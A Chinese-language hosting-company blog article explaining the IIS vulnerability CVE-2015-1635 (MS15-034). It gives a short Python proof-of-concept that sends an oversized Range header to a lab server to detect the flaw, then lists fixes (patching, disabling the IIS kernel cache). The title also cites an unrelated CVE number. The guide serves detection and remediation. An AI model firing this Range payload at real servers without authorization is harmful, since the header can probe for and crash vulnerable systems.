• 产品中心
公告 文档 控制台
登录 免费注册
  • 账户信息
  • 退出账号
    • 意见箱
    恒创运营部门将仔细参阅您的意见和建议,必要时将通过预留邮箱与您保持联络。感谢您的支持!
    意见/建议
    提交建议

    CVE-2015-1635(MS15-034 )远程代码执行漏洞poc(Python)验证和修复(cve2015-2808)

    来源:恒创科技 编辑:恒创科技编辑部
    2024-02-11 19:53:59

    一、 测试环境

    ip: 192.168.80.200

    操作系统:win2012


    CVE-2015-1635(MS15-034 )远程代码执行漏洞poc(Python)验证和修复(cve2015-2808)

    中间件:IIS8.5

    二、 漏洞背景

    漏洞详细参考如下信息:

    ​​https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034​​

    三、 验证

    import requests


    Url = "http://192.168.80.200"

    http_headers={

    "Host":"irrelevant",

    "Range":"bytes=0-18446744073709551615"

    }


    respone = requests.get(url = Url,headers = http_headers)

    if str(respone.content).find("Requested Range Not Satisfiable") >= 0:

    print("url: "+Url+" 存在MS15-034漏洞!")

    else:

    print("url: "+Url+" 未发现漏洞")

    CVE-2015-1635(MS15-034 )远程代码执行漏洞poc(Python)验证和修复_python

    四、 防御措施

    1.打补丁

    ​​https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2015/ms15-034​​

    2.临时禁用IIS内核缓存

    CVE-2015-1635(MS15-034 )远程代码执行漏洞poc(Python)验证和修复_测试环境_02

    CVE-2015-1635(MS15-034 )远程代码执行漏洞poc(Python)验证和修复_测试环境_03

    本文地址:https://www.henghost.com/jishu/22797/
    上一篇: 汉源高科8路开关量转光纤转换器 4路开关量光纤中继器 2路开关量光端机(北京汉源高科) 下一篇: 手机怎么远程登录云服务器?
    相关文章
    查看更多
    [2024-05-08] 云服务器如何运行python程序
    [2024-05-08] Redis怎么与Python集成使用
    [2024-05-08] python的range函数如何使用
    [2024-05-08] python怎么打印数组中的偶数
    [2024-05-08] python的len函数如何使用
    [2024-05-08] python如何统计各类字符个数
    [2024-05-08] python中len函数的用途有哪些
    [2024-05-08] python怎么连接两个字符串并输出

    热门文章

    热门活动

    热门标签 查看详情